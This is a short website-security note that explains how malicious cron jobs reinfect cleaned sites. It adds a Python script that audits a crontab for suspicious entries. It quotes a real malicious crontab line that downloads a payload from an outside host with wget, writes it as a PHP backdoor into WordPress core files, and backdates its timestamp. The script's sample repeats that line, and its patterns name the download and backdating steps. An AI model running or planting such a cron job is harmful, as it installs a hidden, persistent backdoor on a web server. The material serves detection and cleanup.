Malicious Cron Jobs

You can remove malware from your files and database, close all security holes, and change all passwords, and your site may still get reinfected regularly. This may be because you forgot to clean your crontab.

Here’s an example of a malicious cron job that creates a backdoor file in the /wp-includes/Text/Diff/Engine directory every other day:

DOWNLOAD_URL="hxxp://cpanel .jawebsolutions .com/u/w.gz"
LOCAL_FILE_PATH="/home/username/public_html/wp-includes/Text/Diff/Engine/i18n.php"
1 3 */2 * * rm -f /var/tmp/w.gz ; wget -q -O /var/tmp/w.gz $DOWNLOAD_URL && gunzip -c /var/tmp/w.gz > $LOCAL_FILE_PATH && touch -c -t 201007151834 $LOCAL_FILE_PATH && rm -f /var/tmp/w.gz

So don’t forget to check cron jobs in your hosting control panel or use the crontab -l command if you have SSH access.
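The job line above never names the URL or the .php target directly; both sit in crontab variables, so searching the job line alone for ".php" finds nothing. The following audit script is an added example (not part of the original note): it expands crontab variables before matching, and its sample crontab, placeholder host and check patterns are constructed assumptions.

```python
import re
import sys

# Constructed sample modelled on the entry in this note (placeholder host).
SAMPLE_CRONTAB = '''\
MAILTO=""
DOWNLOAD_URL="http://downloads.example.invalid/u/w.gz"
LOCAL_FILE_PATH="/home/username/public_html/wp-includes/Text/Diff/Engine/i18n.php"
1 3 */2 * * rm -f /var/tmp/w.gz ; wget -q -O /var/tmp/w.gz $DOWNLOAD_URL && gunzip -c /var/tmp/w.gz > $LOCAL_FILE_PATH && touch -c -t 201007151834 $LOCAL_FILE_PATH && rm -f /var/tmp/w.gz
*/15 * * * * /usr/bin/php /home/username/public_html/wp-cron.php >/dev/null 2>&1
'''

ENV_LINE = re.compile(r'^([A-Za-z_][A-Za-z0-9_]*)\s*=\s*(.*)$')
VAR_REF = re.compile(r'\$\{?([A-Za-z_][A-Za-z0-9_]*)\}?')
# Heuristics chosen for this example; extend them for your own environment.
CHECKS = [
    ("downloads from the network", re.compile(r'\b(wget|curl)\b')),
    ("writes into a script file", re.compile(r'>\s*\S+\.(php|phtml|pl|py|sh)\b')),
    ("backdates a file timestamp", re.compile(r'\btouch\b[^;&|]*\s-[a-z]*[tdr]\b')),
]

def audit_crontab(text):
    """Return [(line_no, expanded_command, [reasons])] for suspicious job lines."""
    env, findings = {}, []
    for no, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith('#'):
            continue
        m = ENV_LINE.match(line)
        if m:
            # Remember NAME=value lines so job lines can be expanded later.
            env[m.group(1)] = m.group(2).strip().strip('"\'')
            continue
        # Substitute $NAME / ${NAME} the way the job's shell would see them.
        expanded = VAR_REF.sub(lambda v: env.get(v.group(1), v.group(0)), line)
        reasons = [label for label, rx in CHECKS if rx.search(expanded)]
        if reasons:
            findings.append((no, expanded, reasons))
    return findings

if __name__ == "__main__":
    text = SAMPLE_CRONTAB if sys.stdin.isatty() else sys.stdin.read()
    for no, cmd, reasons in audit_crontab(text):
        print(f"line {no}: {', '.join(reasons)}\n    {cmd}")
```

With SSH access, pipe the output of crontab -l into the script; a flagged line is a prompt for manual review, not proof of compromise.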
